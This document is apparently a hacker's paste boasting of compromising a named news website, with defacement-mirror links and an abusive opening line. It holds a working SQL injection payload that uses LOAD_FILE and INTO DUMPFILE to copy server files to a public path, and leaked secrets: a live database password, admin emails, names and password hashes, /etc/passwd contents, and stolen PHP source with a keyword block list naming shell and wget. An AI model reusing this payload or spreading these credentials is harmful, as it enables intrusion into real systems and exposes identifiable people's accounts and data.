son of nasty bitches OWNED TO ass as always

1. http://shamshyan.com/ups/qunem_mamat.txt http://zone-h.org/mirror/id/23635970
2.  
3. http://zone-h.org/mirror/id/23636075 http://img.shamshyan.com/bphotos/qunem_mamat.css
4.  
5.  
6.  
7. /usr/home/sh_user/data/www/img.shamshyan.com/bphotos/
8.  
9.  
10.  
11. /usr/home/sh_user/data/www/guard.shamshyan.com/config.php
12.  
13.  
14. user: security
15. db: security
16. pass: Cw6YMwWCS77ccBYZ
17.  
18.  
19. [{"title":"<?php\n\n$mysql_host = \"localhost\";\n$mysql_database = \"security\";\n$mysql_user = \"security\";\n$mysql_password = \"Cw6YMwWCS77ccBYZ\";\n$connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());\nmysql_select_db($mysql_database, $connect) or die(mysql_error());\nmysql_query(\"SET NAMES utf8\");\n\n?>,<?php\n\n$mysql_host = \"localhost\";\n$mysql_database = \"security\";\n$mysql_user = \"security\";\n$mysql_password = \"Cw6YMwWCS77ccBYZ\";\n$connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());\nmysql_select_db($mysql_database, $connect) or die(mysql_error());\nmysql_query(\"SET NAMES utf8\");\n\n?>,<?php\n\n$mysql_host = \"localhost\";\n$mysql_database = \"security\";\n$mysql_user = \"security\";\n$mysql_password = \"Cw6YMwWCS77ccBYZ\";\n$connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());\nmysql_select_db($mysql_database, $connect) or die(mysql_error());\nmysql_query(\"SET NAMES utf8\");\n\n?>,<?php\n\n$mysql_host = \"localhost\";\n$m","photo":"17","href":"\/hy\/article\/1970\/01\/01\/1\/12\/","date":"1970.01.01 03:00","other_inj":"","spec_videos":"","spec_photos":"","sham_photos":"","views":null}]
20.  
21.  
22.  
23.  
24.  
25.  
26. do=getList&date=' UNION SELECT 1,2,3,4,5,6,LOAD_FILE('/usr/home/sh_user/data/www/guard.shamshyan.com/security.php'),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 INTO DUMPFILE '/usr/home/sh_user/data/www/img.shamshyan.com/bphotos/sec.css'-- '
27.  
28.  
29.  
30. admin_users|,gl_clcats|,gl_images|,gl_views|,hy_category|,hy_content|,hy_group|,hy_lang|,ru_category|,ru_content|
31.  
32.  
33.  
34. columns:
35. user_id|,email|,user_name|,user_password|,user_login|,user_group|,posts|,avatar|,reg|,online
36.  
37. admin credentials:
38.  
39. |support@mxarts.net|Паша Айвазян|4fdc72a90d87d4d3c5ec21e3b18d03f5|devmode|1|586|/ups/avatars/217468_527526457282407_1784073241_n.jpg|2014-01-05 00:00:00|yes,
40. <pre>2||Գևորգ Էմին-Տերյան|8298213b246e3b24f6ee89438203a6bb|gevorget|1|8|/ups/avatars/1235122_662977063732178_1564691659_n.jpg|2014-01-05 00:00:00|yes,
41. <pre>5|none|Marat Balayan|108910111213141516171819202122232425
42.  
43.  
44.  
45.  
46.  
47. /etc/passwd
48. $FreeBSD: release/10.0.0/etc/master.passwd 256366 2013-10-12 06:08:18Z rpaulo $
49. #
50. root:*:0:0:Charlie &:/root:/bin/csh
51. toor:*:0:0:Bourne-again Superuser:/root:
52. daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
53. operator:*:2:5:System &:/:/usr/sbin/nologin
54. bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
55. tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
56. kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
57. games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
58. news:*:8:8:News Subsystem:/:/usr/sbin/nologin
59. man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
60. sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
61. smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
62. mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
63. bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
64. unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
65. proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
66. _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
67. _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
68. uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
69. pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
70. auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
71. www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
72. hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
73. nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
74. sh_user:*:1001:1001:Gagik Shamshyan:/home/sh_user:/bin/sh
75. mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
76.  
77.  
78.  
79.  
80. //index.php
81.  
82.  
83. <?php
84.  
85. if($_GET['do'] == 'search') {
86. include '/usr/home/sh_user/data/www/guard.shamshyan.com/config.php';
87. include '/usr/home/sh_user/data/www/guard.shamshyan.com/security.php';
88. }
89.  
90. @session_start ();
91. @ob_start ();
92. @ob_implicit_flush (0);
93.  
94. @error_reporting ( E_ALL ^ E_WARNING ^ E_NOTICE );
95. @ini_set ( 'display_errors', true );
96. @ini_set ( 'html_errors', false );
97. @ini_set ( 'error_reporting', E_ALL ^ E_WARNING ^ E_NOTICE );
98.  
99. define ( 'MX', true );
100. define ( 'ROOT_DIR', dirname ( __FILE__ ) );
101. define ( 'CORE_DIR', ROOT_DIR . '/core' );
102. define ( 'MOD_DIR', ROOT_DIR . '/backend' );
103.  
104. require_once CORE_DIR . '/my_config.php';
105. //$memcache = new Memcache;
106. //$memcache->connect('127.0.0.1', 11211) or die ("Could not connect");
107.  
108. require_once CORE_DIR . '/lng.php';
109. require_once CORE_DIR . '/mysql/is_mysql.php';
110. require_once CORE_DIR . '/function.php';
111. require_once CORE_DIR . '/frontend.php';
112. require_once CORE_DIR . '/bbcode/bb_code.php';
113. require_once CORE_DIR . '/login.php';
114.  
115. $homepage = '/';
116. $mainpage = '/'.$lang.'/';
117. $altmainpage = '/index.php';
118. $currentpage = $_SERVER['REQUEST_URI'];
119. if($homepage == $currentpage or $altmainpage == $currentpage) {
120. header("Location: http://shamshyan.com/$lang/"); /* Redirect browser */
121. }
122. if($mainpage == $currentpage) {$content .= $html->display("main_view");}
123.  
124. define ( 'TEMPLATE_DIR', ROOT_DIR . '/frontend/'.$tpl_lang['skin'] );
125.  
126. include CORE_DIR . '/get.php';
127.  
128. //if($do=="article") {
129. //$syear = strip_tags($_GET["syear"]);
130. //$smonth = strip_tags($_GET["smonth"]);
131. //$sday = strip_tags($_GET["sday"]);
132. //$cid = strip_tags($_GET["cid"]);
133. //global $db;
134. //$xrow = $db->super_select('content','*',array('WHERE'=>"id='".$cid."' AND hide='2'"));
135. //if($syear!=2014){
136. //if($xrow['url_name'] == '') {
137. //$href = '/'.$lang.'/article/'.syear_time($xrow['date']).'/'.smonth_time($xrow['date']).'/'.sday_time($xrow['date']).'/'.$xrow['id'].'/';
138. //header('HTTP/1.1 301 Moved Permanently');
139. //header('Location: '.$href.'');
140. //exit();
141. //} else {
142. //$xhref = '/'.$lang.'/article/'.syear_time($xrow['date']).'/'.smonth_time($xrow['date']).'/'.sday_time($xrow['date']).'/'.$xrow['id'].'/'.$xrow['url_name'].'/';
143. //header('HTTP/1.1 301 Moved Permanently');
144. //header('Location: '.$xhref.'');
145. //exit();
146. //}
147. //}
148. //}
149.  
150. foreach(explode(",",$config['bot']) as $bot){
151. if($bot !== '' and preg_match("'".$bot."'si",$_SERVER['HTTP_USER_AGENT']) and $tpl_lang["skin"] !== ''){
152. $tpl_lang['skin'] = $tpl_lang['skin'];
153. $config['ajax'] = 'no';
154. break;
155. }
156. }
157.  
158. c_mode(); // инсталяция модулей
159.  
160. $user_group = user_group();
161.  
162. $main_moduls = run_mode('admin/,main/','saite_mod.php','saite_mod.php');
163.  
164. //$bb_code->html_init();
165.  
166. $show_header = run_mode('admin/sfnews/,modul/,function/,coment/','header.php','header.php');
167.  
168. foreach($show_header['path'] as $global_file => $path){
169. include ROOT_DIR . $path;
170. }
171.  
172. $header = '<meta name="description" content="'.((isset($description)) ? $description : $tpl_lang['description']).'" />'."\n".$header;
173. $header = '<meta name="keywords" content="'.((isset($keywords)) ? $keywords : $tpl_lang['keywords']).'" />'."\n".$header;
174. $header = '<title>'.((isset($title)) ? $title : $tpl_lang['home_title']).'</title>'."\n".$header;
175.  
176. $html->THEME = '/frontend/'.$tpl_lang['skin'];
177. $html->header = $header;
178. $html->content = $content;
179. $html->lang = $lang;
180. $html->xhomepage = '/'.$lang.'/';
181. $html->ihomepage = '/index.php';
182. $html->xcurrentpage = $_SERVER['REQUEST_URI'];
183. $html->current_date_s = date("Y-m-d H:i");
184. $html->current_date = date("Y-m-d H:i:s");
185. $html->tpl_lang = $tpl_lang;
186. $html->config = $config;
187. $html->c_mode = $c_mode;
188. $html->c_mode_type = $c_mode_type;
189. $html->cat_list = $cat_list;
190. $html->member_id = $member_id;
191. $html->user_group = $user_group;
192. $html->db = $db;
193. $html->bb_code = $bb_code;
194. $html->is_logged = $is_logged;
195. $html->action = $action;
196. $html->do = $do;
197.  
198.  
199. foreach($main_moduls['path'] as $global_file => $path){
200. include ROOT_DIR . $path;
201. }
202.  
203. if(file_exists(ROOT_DIR.'/frontend/'.$tpl_lang['skin'].'/index.php')) print $html->display("index", $id);
204. else{
205. print $html->no_exists('index');
206. }
207.  
208. ?>
209.  
210.  
211.  
212.  
213.  
214. //config.php
215.  
216. <?php
217.  
218. $mysql_host = "localhost";
219. $mysql_database = "security";
220. $mysql_user = "security";
221. $mysql_password = "Cw6YMwWCS77ccBYZ";
222. $connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());
223. mysql_select_db($mysql_database, $connect) or die(mysql_error());
224. mysql_query("SET NAMES utf8");
225.  
226. ?>
227.  
228.  
229.  
230.  
231. //security.php
232.  
233. ?php
234.  
235.  
236. function isBot($botname = ''){
237. /* Эта функция будет проверять, является ли посетитель роботом поисковой системы */
238. $bots = array(
239. 'rambler','googlebot','aport','yahoo','msnbot','turtle','mail.ru','omsktele',
240. 'yetibot','picsearch','sape.bot','sape_context','gigabot','snapbot','alexa.com',
241. 'megadownload.net','askpeter.info','igde.ru','ask.com','qwartabot','yanga.co.uk',
242. 'scoutjet','similarpages','oozbot','shrinktheweb.com','aboutusbot','followsite.com',
243. 'dataparksearch','google-sitemaps','appEngine-google','feedfetcher-google',
244. 'liveinternet.ru','xml-sitemaps.com','agama','metadatalabs.com','h1.hrn.ru',
245. 'googlealert.com','seo-rus.com','yaDirectBot','yandeG','yandex',
246. 'yandexSomething','Copyscape.com','AdsBot-Google','domaintools.com',
247. 'Nigma.ru','bing.com','dotnetdotcom'
248. );
249. foreach($bots as $bot)
250. if(stripos($_SERVER['HTTP_USER_AGENT'], $bot) !== false){
251. $botname = $bot;
252. return true;
253. }
254. return false;
255. }
256.  
257. //Anti XSS (Cross-site Scripting)
258. function security($input)
259. {
260. @$input = mysql_real_escape_string($input);
261. @$input = strip_tags($input);
262. @$input = stripslashes($input);
263. return $input;
264. }
265.  
266. //getBrowser Function
267. function getBrowser()
268. {
269. $u_agent = $_SERVER['HTTP_USER_AGENT'];
270. $bname = 'Unknown';
271. $platform = 'Unknown';
272. $version = "";
273.  
274. //First get the platform
275. if (preg_match('/linux/i', $u_agent)) {
276. $platform = 'Linux';
277. } elseif (preg_match('/macintosh|mac os x/i', $u_agent)) {
278. $platform = 'Mac';
279. } elseif (preg_match('/windows|win32/i', $u_agent)) {
280. $platform = 'Windows';
281. }
282.  
283. // Next get the name of the useragent yes seperately and for good reason
284. if (preg_match('/MSIE/i', $u_agent) && !preg_match('/Opera/i', $u_agent)) {
285. $bname = 'Internet Explorer';
286. $ub = "MSIE";
287. } elseif (preg_match('/Firefox/i', $u_agent)) {
288. $bname = 'Mozilla Firefox';
289. $ub = "Firefox";
290. } elseif (preg_match('/Chrome/i', $u_agent)) {
291. $bname = 'Google Chrome';
292. $ub = "Chrome";
293. } elseif (preg_match('/Safari/i', $u_agent)) {
294. $bname = 'Apple Safari';
295. $ub = "Safari";
296. } elseif (preg_match('/Opera/i', $u_agent)) {
297. $bname = 'Opera';
298. $ub = "Opera";
299. } elseif (preg_match('/Netscape/i', $u_agent)) {
300. $bname = 'Netscape';
301. $ub = "Netscape";
302. }
303.  
304. // finally get the correct version number
305. $known = array(
306. 'Version',
307. $ub,
308. 'other'
309. );
310. $pattern = '#(?<browser>' . join('|', $known) . ')[/ ]+(?<version>[0-9.|a-zA-Z.]*)#';
311. if (!preg_match_all($pattern, $u_agent, $matches)) {
312. // we have no matching number just continue
313. }
314.  
315. // See how many we have
316. $i = count($matches['browser']);
317. if ($i != 1) {
318. //We will have two since we are not using 'other' argument yet
319. //See if version is before or after the name
320. if (strripos($u_agent, "Version") < strripos($u_agent, $ub)) {
321. $version = $matches['version'][0];
322. } else {
323. $version = $matches['version'][1];
324. }
325. } else {
326. $version = $matches['version'][0];
327. }
328.  
329. // Check if we have a number
330. if ($version == null || $version == "") {
331. $version = "?";
332. }
333.  
334. return array(
335. 'userAgent' => $u_agent,
336. 'name' => $bname,
337. 'version' => $version,
338. 'platform' => $platform,
339. 'pattern' => $pattern
340. );
341. }
342. $ua = getBrowser();
343.  
344. //Getting visitor country
345. function visitor_country()
346. {
347. $client = @$_SERVER['HTTP_CLIENT_IP'];
348. $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
349. $remote = $_SERVER['REMOTE_ADDR'];
350. $result = "Unknown";
351. if (filter_var($client, FILTER_VALIDATE_IP)) {
352. $ip = $client;
353. } elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
354. $ip = $forward;
355. } else {
356. $ip = $remote;
357. }
358.  
359. $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip));
360.  
361. if ($ip_data && $ip_data->geoplugin_countryName != null) {
362. $result = $ip_data->geoplugin_countryName;
363. }
364.  
365. return $result;
366. }
367.  
368. //Checking if phpGuard is enabled
369. @$query = mysql_query("SELECT * FROM settings");
370. @$row = mysql_fetch_assoc($query);
371. if ($row['phpguard_enabled'] == "Yes" and !isBot()) {
372.  
373. //Ban System
374. $guestip = $_SERVER['REMOTE_ADDR'];
375. @$querybanned = mysql_query("SELECT * FROM `bans` WHERE ip='$guestip'");
376. @$banned = mysql_num_rows($querybanned);
377. @$row = mysql_fetch_array($querybanned);
378. @$queryb = mysql_query("SELECT * FROM settings");
379. @$rowb = mysql_fetch_assoc($queryb);
380. if ($banned > 0) {
381. header('HTTP/1.1 403 Forbidden');
382. exit();
383. }
384.  
385. //Country Ban
386. @$country = visitor_country();
387. @$querybanned = mysql_query("SELECT * FROM `bans-country` WHERE country='$country'");
388. @$banned = mysql_num_rows($querybanned);
389. @$row = mysql_fetch_array($querybanned);
390. @$queryb = mysql_query("SELECT * FROM settings");
391. @$rowb = mysql_fetch_assoc($queryb);
392. if ($banned > "0") {
393. header('HTTP/1.1 403 Forbidden');
394. exit();
395. }
396.  
397. //Anti SQLi (SQL Injection)
398. @$query = mysql_query("SELECT * FROM settings");
399. @$row = mysql_fetch_assoc($query);
400. if ($row['sqli_protection'] == "Yes") {
401.  
402. $array = array(
403. "union",
404. "sql",
405. "mysql",
406. "database",
407. "cookie",
408. "coockie",
409. "select",
410. "from",
411. "where",
412. "benchmark",
413. "concat",
414. "table",
415. "into",
416. "by",
417. "limit",
418. "ALL",
419. "values",
420. "exec",
421. "shell",
422. "truncate",
423. "wget",
424. "/**/",
425. "0x3a",
426. "password",
427. "BUN",
428. "char",
429. "S@BUN",
430. "null",
431. "'%",
432. "OR%"
433.  
434. );
435. foreach ($array as $d) {
436. @$string = security($_SERVER['QUERY_STRING']);
437. if (strpos(strtolower($string), $d) !== false) {
438. $ip = $_SERVER['REMOTE_ADDR'];
439. $loc = $_SERVER['PHP_SELF'];
440. @$browser = $ua['name'];
441. @$browser_version = $ua['version'];
442. @$os = $ua['platform'];
443. @$country = visitor_country();
444. $date = date("d F Y");
445. $time = date("H:i");
446. $attacked_page = security('' . $loc . '?' . $string . '');
447. $type = "SQL Injection";
448. if ($row['sqli_logging'] == "Yes") {
449. @$queryvalid = mysql_query("SELECT * FROM `hacker-attacks` WHERE ip='$ip' and attacked_page='$attacked_page' and type='SQL Injection' LIMIT 1");
450. @$validator = mysql_num_rows($queryvalid);
451. if ($validator > "0") {
452. header( "Refresh: 0; url=".$row['sqli_redirect']."" );
453. } else {
454. $log = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
455. @$result = mysql_query($log);
456. header( "Refresh: 0; url=".$row['sqli_redirect']."" );
457. }
458. }
459. if ($row['sqli_autoban'] == "Yes") {
460. @$bansvalid = mysql_query("SELECT * FROM `bans` WHERE ip='$ip' LIMIT 1");
461. @$bansvalidator = mysql_num_rows($bansvalid);
462. if ($bansvalidator > "0") {
463. header( "Refresh: 0; url=".$row['sqli_redirect']."" );
464. exit();
465. } else {
466. $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
467. @$result = mysql_query($log);
468. header( "Refresh: 0; url=".$row['sqli_redirect']."" );
469. exit();
470. }
471. }
472.  
473. }
474. }
475. }
476.  
477. @$query = mysql_query("SELECT * FROM settings");
478. @$row = mysql_fetch_assoc($query);
479. if ($row['proxy_protection'] == "Yes") {
480. //Anti Proxy
481. $proxy_headers = array(
482. 'HTTP_VIA',
483. 'HTTP_X_FORWARDED_FOR',
484. 'HTTP_FORWARDED_FOR',
485. 'HTTP_X_FORWARDED',
486. 'HTTP_FORWARDED',
487. 'HTTP_CLIENT_IP',
488. 'HTTP_FORWARDED_FOR_IP',
489. 'VIA',
490. 'X_FORWARDED_FOR',
491. 'FORWARDED_FOR',
492. 'X_FORWARDED',
493. 'FORWARDED',
494. 'CLIENT_IP',
495. 'FORWARDED_FOR_IP',
496. 'HTTP_PROXY_CONNECTION',
497. 'HTTP_PC_REMOTE_ADDR',
498. 'HTTP_X_IMFORWARDS',
499. 'HTTP_XROXY_CONNECTION'
500. );
501. foreach ($proxy_headers as $proxy_header) {
502. if (isset($_SERVER[$proxy_header])) {
503. $ip = $_SERVER['REMOTE_ADDR'];
504. @$browser = $ua['name'];
505. @$browser_version = $ua['version'];
506. @$os = $ua['platform'];
507. @$country = visitor_country();
508. $date = date("d F Y");
509. $time = date("H:i");
510. $type = "Proxy";
511. if ($row['proxy_logging'] == "Yes") {
512. @$queryvalid2 = mysql_query("SELECT * FROM `hacker-attacks` WHERE ip='$ip' and type='Proxy' LIMIT 1");
513. @$validator2 = mysql_num_rows($queryvalid2);
514. if ($validator2 > "0") {
515. header( "Refresh: 0; url=".$row['proxy_redirect']."" );
516. } else {
517. $log2 = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
518. @$result2 = mysql_query($log2);
519. header( "Refresh: 0; url=".$row['proxy_redirect']."" );
520. }
521. }
522. if ($row['proxy_autoban'] == "Yes") {
523. @$bansvalid = mysql_query("SELECT * FROM `bans` WHERE ip='$ip' LIMIT 1");
524. @$bansvalidator = mysql_num_rows($bansvalid);
525. if ($bansvalidator > "0") {
526. header( "Refresh: 0; url=".$row['proxy_redirect']."" );
527. exit();
528. } else {
529. $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
530. @$result = mysql_query($log);
531. header( "Refresh: 0; url=".$row['proxy_redirect']."" );
532. exit();
533. }
534. }
535. }
536. }
537. }
538.  
539. @$query = mysql_query("SELECT * FROM settings");
540. @$row = mysql_fetch_assoc($query);
541. $xguestip = $_SERVER['REMOTE_ADDR'];
542. @$xquerybanned = mysql_query("SELECT * FROM `bans` WHERE ip='$xguestip' and type='DDoS'");
543. @$xbanned = mysql_num_rows($xquerybanned);
544. if ($xbanned < 1) {
545. if ($row['ddos_protection'] == "Yes") {
546. //Anti DDoS (Distributed Denial of Service Attacks)
547. if (!isset($_SESSION)) { @session_start(); }
548.  
549. if($_SESSION['xlast_session_requestx'] > (time() - 0.3)){
550. if(empty($_SESSION['xlast_request_countx'])){
551. $_SESSION['xlast_request_countx'] = 1;
552. }elseif($_SESSION['xlast_request_countx'] < 5){
553. $_SESSION['xlast_request_countx'] = $_SESSION['xlast_request_countx'] + 1;
554. }elseif($_SESSION['xlast_request_countx'] >= 5){
555. $ip = $_SERVER['REMOTE_ADDR'];
556. @$browser = $ua['name'];
557. @$browser_version = $ua['version'];
558. @$os = $ua['platform'];
559. @$country = visitor_country();
560. $date = date("d F Y");
561. $time = date("H:i");
562. $type = "DDoS";
563.  
564.  
565.  
566. if ($row['ddos_autoban'] == "Yes") {
567.  
568.  
569. $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
570. @$result = mysql_query($log);
571. $log3 = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
572. @$result3 = mysql_query($log3);
573. header( "Refresh: 0; url=".$row['ddos_redirect']."" );
574. exit;
575.  
576. }
577. } else {
578. $_SESSION['xlast_request_countx'] = 1;
579. }
580. }
581.  
582.  
583. $_SESSION['xlast_session_requestx'] = time();
584. }
585. }
586.  
587. @$query = mysql_query("SELECT * FROM settings");
588. @$row = mysql_fetch_assoc($query);
589. if ($row['spam_protection'] == "Yes") {
590. //DNSBL Spam Security
591. $ip = $_SERVER['REMOTE_ADDR'];
592. @$browser = $ua['name'];
593. @$browser_version = $ua['version'];
594. @$os = $ua['platform'];
595. @$country = visitor_country();
596. $date = date("d F Y");
597. $time = date("H:i");
598. $type = "Spam";
599. $dnsbl_lookup = array(
600. //"dnsbl.solid.net",
601. "dnsbl-1.uceprotect.net",
602. "dnsbl-2.uceprotect.net",
603. "dnsbl-3.uceprotect.net",
604. "dnsbl.dronebl.org",
605. "dnsbl.sorbs.net",
606. "zen.spamhaus.org"
607. );
608. $reverse_ip = implode(".", array_reverse(explode(".", $ip)));
609. foreach ($dnsbl_lookup as $host) {
610. if (checkdnsrr($reverse_ip . "." . $host . ".", "A")) {
611. @$queryvalid4 = mysql_query("SELECT * FROM `hacker-attacks` WHERE ip='$ip' and type='Spam' LIMIT 1");
612. @$validator4 = mysql_num_rows($queryvalid4);
613. if ($validator4 > "0") {
614. header( "Refresh: 0; url=".$row['spam_redirect']."" );
615. } else {
616. $log4 = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
617. @$result4 = mysql_query($log4);
618. header( "Refresh: 0; url=".$row['spam_redirect']."" );
619. }
620. if ($row['spam_autoban'] == "Yes") {
621. @$bansvalid = mysql_query("SELECT * FROM `bans` WHERE ip='$ip' LIMIT 1");
622. @$bansvalidator = mysql_num_rows($bansvalid);
623. if ($bansvalidator > "0") {
624. header( "Refresh: 0; url=".$row['spam_redirect']."" );
625. exit();
626. } else {
627. $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
628. @$result = mysql_query($log);
629. header( "Refresh: 0; url=".$row['spam_redirect']."" );
630. exit();
631. }
632. }
633.  
634. }
635. }
636. }
637.  
638. }
639.  
640. ?>